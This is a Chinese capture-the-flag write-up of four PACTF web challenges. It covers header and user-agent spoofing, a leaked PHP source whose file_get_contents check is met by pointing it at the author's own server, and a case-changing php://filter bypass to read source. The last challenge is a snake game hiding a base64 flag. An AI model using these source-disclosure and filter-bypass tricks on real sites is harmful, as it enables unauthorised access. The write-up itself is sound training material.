PACTF No.2 , 本也想打酱油,没想到做出来一道Web,继续研究了另一道。这里是WriteUp,记录自己的First Blood.
1. First Blood of Web:
题目:
http://114.115.170.172:10400/
mobile
看到这个其实就想到怎样用所谓的“Pixel 2 XL手机”, 比赛题肯定不会让你去临时找个真的这种手机才行,但Chrome浏览器有个手机调试的功能,直接上:
打开F12.选择手机调试,选择“Pixel 2 XL”:
Pixel 2 XL
F12
根据提示,修改请求方式为:LGET, 添加HTTP请求头部:Referer:pixel
flag
Response里就有了flag! W0nD3rFul_fuTnr4
补全提交:PACTF{W0nD3rFul_fuTnr4} 哈哈,我的First Blood就这样生成了~~~~~
2. Second Blood Of Web:
http://114.115.170.172:10010/
刚开始还用http://114.115.170.172:10010/index.php?/a=http://www.baidu.com(以为是SSRF)
但弄了好久也没啥用。
到了晚上,扔扫描器扫了下:
index.php~
看源码可以更清楚:
| <!--index.php~--> |
| | |
| | |
| | <?php |
| | error_reporting(0); |
| | session_start(); |
| | |
| | |
| | if ($_SESSION['level1'] !== 'go') { |
| | if(!$_GET['a']) |
| | { |
| | header('Location: index.php?a=1a'); |
| | die(); |
| | } |
| | $a=$_GET['a']; |
| | |
| | if (stristr($a, 'input')) { |
| | die('no no no no '); |
| | } |
| | |
| | if (stristr($a, 'http')) { |
| | echo "<br />正确的的道路!平安!碰碰碰!<br />";; |
| | } |
| | |
| | $a2 = @file_get_contents($a,'r'); |
| | |
| | if($a2=="12345") |
| | { |
| | echo "离flag又近了一步!"; |
| | $_SESSION['level1'] = 'go'; |
| | header('Location: index.php'); |
| | } |
| | else |
| | { |
| | print "<p class='layui-elem-quote'> |
| | Tips: 12345,no CRLF。 |
| | </p>"; |
| | } |
| | }else{ |
| | |
| | |
| | if(!($_POST['b']) and !($_POST['c'])) |
| | { |
| | echo "<p class='layui-elem-quote'><a href='[index.php?h=1&r=1](http://114.115.170.172:10010/index.php?h=1&r=1)' target='_blank' class='layui-btn layui-btn-big'>flag</a></p> |
| | 要通过这一关需要POST参数b和c! |
| | </p>"; |
| | die(); |
| | } |
| | |
| | $b = $_POST['b']; |
| | $c = $_POST['c']; |
| | |
| | if (!(is_numeric($b))) { |
| | echo "<br /> b 出错!<br />"; |
| | die(); |
| | } |
| | |
| | if (!(ctype_upper($c)) || (strlen($c) >= 5)) { |
| | echo "<br /> c 出错!<br />"; |
| | die(); |
| | } |
| | |
| | echo "<p class='layui-elem-quote'><a href='[index.php?h=1&r=1](http://114.115.170.172:10010/index.php?h=1&r=1)' target='_blank' class='layui-btn layui-btn-big'>flag</a></p>"; |
| | |
| | $hack = $_GET[h]; |
| | $rep = $_GET[r]; |
| | |
| | if ((strlen($hack) >= 6) || (strlen($rep) >= 6)) { |
| | echo "<br /> h OR r 出错!<br />"; |
| | die(); |
| | } |
| | |
| | $str1 = hash('md5', $b, false); |
| | $str2 = strtr(hash('md5', $c, false), $hack, $rep); |
| | |
| | echo "<p class='layui-elem-quote'>str1 : $str1</p>"; |
| | echo "<p class='layui-elem-quote'>str2 : $str2</p>"; |
| | |
| | |
| | |
| | if (($str1 == $str2) && !($b === $c) && (strlen($c) === 4)) { |
| | include('flag.php'); |
| | echo "<p class='layui-elem-quote'> |
| | $flag |
| | </p>"; |
| | } |
| | |
| | } |
| | |
| | |
| | ?> |
index.php代码在注释里。
那就照着这个逻辑来搞:
- 首先要使level1 的session值为‘go’,这要满足a参数:
$a2 = @file_get_contents($a,'r'); |
| | |
| | if($a2=="12345")
因为发现a参数可以是httpURL地址,所以想到用自己的VPS上的接口,Flask做的上传文件的页面,现在直接将HTML内容改成12345,API: http://xx.xx.xx.xx:3421/file/upload,浏览器访问看到返回12345OK。
然后先访问下:http://114.115.170.172:10010/index.php?a=http://xx.xx.xx.xx:3421/file/upload
然后就到了下一步:
image.png
结合代码逻辑,现在的重难点就是怎么找到B,C, h,r且满足 :
B是纯数字,C是4位大写字母,h,r都小于6位。
且,B的Md5值,与将C的md5值里的H依顺序替换成R后的结果 相等。
最终有个结果:(上班了补充细节,这部分是同事搞出来的)
flag
3. Third Blood of Web:(这道题想了好久,同事一样,都没想到用PHP://filter)
image.png
image.png
file参数改一下:
image.png
然后用PHP://filter 读取此PHP,如下(这里注意对php://filter有过滤,但没有判断大小写,所以这里绕过:Php://filter)
PHP://filter
此时就想到肯定有戏了:
将返回内容用base64解码:
得到:
decode
按照左边的代码逻辑,构造参数即可。
4. Forth Blood of Web:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>贪吃蛇</title>
<style type="text/css">
* {margin:0; padding:0}
body {background:#333; -moz-user-select:none; text-align:center; font-size:12px}
table {margin:80px auto 10px auto; overflow:hidden; border-collapse:collapse; }
td {width:20px; height:20px; border:1px solid #eee; background:#f4f4f4}
.cover {background:#39c;}
.food {background:#093}
.block {background:#333}
.brake {background:#f00}
.skate {background:#00f}
#say {margin-top:50px; color:white}
#help {width:420px; margin:0 auto; line-height:17px; color:white}
#help span {float:left; margin-right:10px}
#help .box {width:15px; height:15px; margin-right:5px; border:1px solid white}
#btnStart {clear:both; width:100px; height:30px; margin-top:10px; padding:0; background:#bbb; color:#222; border:1px solid #fff; border-bottom-color:#000; border-right-color:#000; cursor:pointer}
</style>
<script type="text/javascript">
// common
function $(str) {
return document.getElementById(str);
}
function $tag(str,target) {
target = target || document;
return target.getElementsByTagName(str);
}
// global
// const
var WIDTH = 20, //网格宽度
HEIGHT = 20, //网格高度
SAY = ["pa_ctf","可以啊,继续加油!","知道吗?你离FLAG越来越近了!","厉害了看来你是一个游戏高手!","FLAG就在前方看你的了!","You Win?"];
var len = 3, //蛇的长度
speed, //爬行速度
gridElems = multiArray(WIDTH,HEIGHT), //单元格对象
carrier, //承载对象(食物,障碍,滑板,刹车)
snake, //蛇每节的坐标点
info, //交互对话
btnStart, //开始按钮
topScore = len,
snakeTimer, //蛇行走计时器
brakeTimers = [], //随机刹车
skateTimers = [], //随机滑板
directkey,
anss = 'ZzJsVX'; // 方向键值 37-40 左上右下
window.onload = function(){
info = $("say");
btnStart = $("btnStart");
initGrid(); //网格初始化
document.onkeydown = attachEvents; //绑定方向事件
btnStart.onclick = function (e) {
btnStart.blur(); //firefox中必须释放焦点
start(); //游戏开始
btnStart.setAttribute("disabled",true);
btnStart.style.color = "#aaa";
}
}
//开始游戏
function start() {
len = 3;
speed = 10;
directkey = 39;
carrier = multiArray(WIDTH,HEIGHT);
snake = new Array();
clear();
initSnake(); //蛇初始化
addObject("food");
walk();
addRandomBrake();
}
//创建网格
function initGrid() {
var body = $tag("body")[0];
var table = document.createElement("table"),
tbody = document.createElement("tbody")
for(var j = 0; j < HEIGHT; j++) {
var col = document.createElement("tr");
for(var i = 0; i < WIDTH; i++) {
var row = document.createElement("td");
gridElems[i][j] = col.appendChild(row);
}
tbody.appendChild(col);
}
table.appendChild(tbody);
$("snakeWrap").appendChild(table);
}
anss += 'R0NG9u';
//创建蛇
function initSnake() {
var pointer = randomPointer(len-1, len-1, WIDTH/2);
for(var i = 0; i < len; i++) {
var x = pointer[0] - i,
y = pointer[1];
snake.push([x,y]);
carrier[x][y] = "cover";
}
}
anss += 'b1VzX';
//添加键盘事件
function attachEvents(e) {
e = e || event;
directkey = Math.abs(e.keyCode - directkey) != 2 && e.keyCode > 36 && e.keyCode < 41 ? e.keyCode : directkey; //非方向键、反向无效
return false;
}
function walk() {
if(snakeTimer) window.clearInterval(snakeTimer);
snakeTimer = window.setInterval(step, Math.floor(3000/speed));
}
anss += '1NuN2E4ZQo=';
function step() {
//获取目标点
var headX = snake[0][0],
headY = snake[0][1];
switch(directkey) {
case 37: headX -= 1; break;
case 38: headY -= 1; break;
case 39: headX += 1; break
case 40: headY += 1; break;
}
//碰到边界,阻挡物,则结束游戏
if(headX >= WIDTH || headX < 0 || headY >= HEIGHT || headY < 0 || carrier[headX][headY] == "block" || carrier[headX][headY] == "cover" ) {
trace("GAME OVER");
if(getText($("score"))*1 < len) trace(len,$("score"));
btnStart.removeAttribute("disabled");
btnStart.style.color = "#000";
window.clearInterval(snakeTimer);
for(var i = 0; i < brakeTimers.length; i++) window.clearTimeout(brakeTimers[i]);
for(var i = 0; i < skateTimers.length; i++) window.clearTimeout(skateTimers[i]);
return;
}
//加速
if(len % 4 == 0 && speed < 60 && carrier[headX][headY] == "food") {
speed += 5;
walk();
trace("加速!");
}
//捡到刹车
if(carrier[headX][headY] == "brake") {
speed = 5;
walk();
trace("恭喜!捡到刹车一个。");
}
//遭遇滑板
if(carrier[headX][headY] == "skate") {
speed += 20;
walk();
trace("遭遇滑板!");
}
//添加阻挡物
if(len % 6 == 0 && len < 60 && carrier[headX][headY] == "food") {
addObject("block");
}
//对话
if(len <= 60 && len % 10 == 0) {
var cheer = SAY[len/10-1];
trace(cheer);
}
if(len == 70) {
trace(anss);
}
if(len <= 100 && len > 60) {
var cheer = SAY[5];
trace(cheer);
}
//吃东西
if(carrier[headX][headY] != "food") {
var lastX = snake[snake.length-1][0],
lastY = snake[snake.length-1][1];
carrier[lastX][lastY] = false;
gridElems[lastX][lastY].className = "";
snake.pop();
} else {
carrier[headX][headY] = false;
trace("吃到食物");
addObject("food");
}
snake.unshift([headX,headY]);
carrier[headX][headY] = "cover";
gridElems[headX][headY].className = "cover";
len = snake.length;
}
//添加物品
function addObject(name) {
var p = randomPointer();
carrier[p[0]][p[1]] = name;
gridElems[p[0]][p[1]].className = name;
}
//添加随机数量刹车和滑板
function addRandomBrake() {
var num = randowNum(1,5);
for(var i = 0; i < num; i++) {
brakeTimers.push( window.setTimeout(function(){addObject("brake")},randowNum(10000,100000)) );
skateTimers.push( window.setTimeout(function(){addObject("skate")},randowNum(5000,100000)) );
}
}
//输出信息
function trace(sth,who) {
who = who || info;
if(document.all) who.innerText = sth;
else who.textContent = sth;
}
//获取信息
function getText(target) {
if(document.all) return target.innerText;
else return target.textContent;
}
//创建二维数组
function multiArray(m,n) {
var arr = new Array(n);
for(var i=0; i<m; i++)
arr[i] = new Array(m);
return arr;
}
//清除画面
function clear() {
for(var y = 0; y < gridElems.length; y++) {
for(var x = 0; x < gridElems[y].length; x++) {
gridElems[x][y].className = "";
}
}
}
//产生指定范围随机点
function randomPointer(startX,startY,endX,endY) {
startX = startX || 0;
startY = startY || 0;
endX = endX || WIDTH;
endY = endY || HEIGHT;
var p = [],
x = Math.floor(Math.random()*(endX - startX)) + startX,
y = Math.floor(Math.random()*(endY - startY)) + startY;
if(carrier[x][y]) return randomPointer(startX,startY,endX,endY);
p[0] = x;
p[1] = y;
return p;
}
//产生随机整数
function randowNum(start,end) {
return Math.floor(Math.random()*(end - start)) + start;
}
</script>
</head>
<body onselectstart="return false">
<div id="say">贪吃蛇</div>
<div id="snakeWrap"></div>
<div id="help">
<span class="box food"></span><span>绿色食物</span>
<span class="box block"></span><span>灰色毒品</span>
<span class="box skate"></span><span>蓝色滑板</span>
<span class="box brake"></span><span>红色刹车</span>
<span style="float:right">最高分:<strong id="score">0</strong></span>
<input type="button" id="btnStart" value="开始游戏" />
</div>
</body>
</html>
上面个页面是个JS的贪吃蛇游戏,我开始也看到anss这个字符的不一样了,可是没想到直接在console里打出来,结果老大做出来,就没弄,做另一题了。其实直接cobsole.log(anss)出来:
ZzJsVXR0NG9ub1VzX1NuN2E4ZQo= 现在一看,就是base64编码,解码即得flag。
网友评论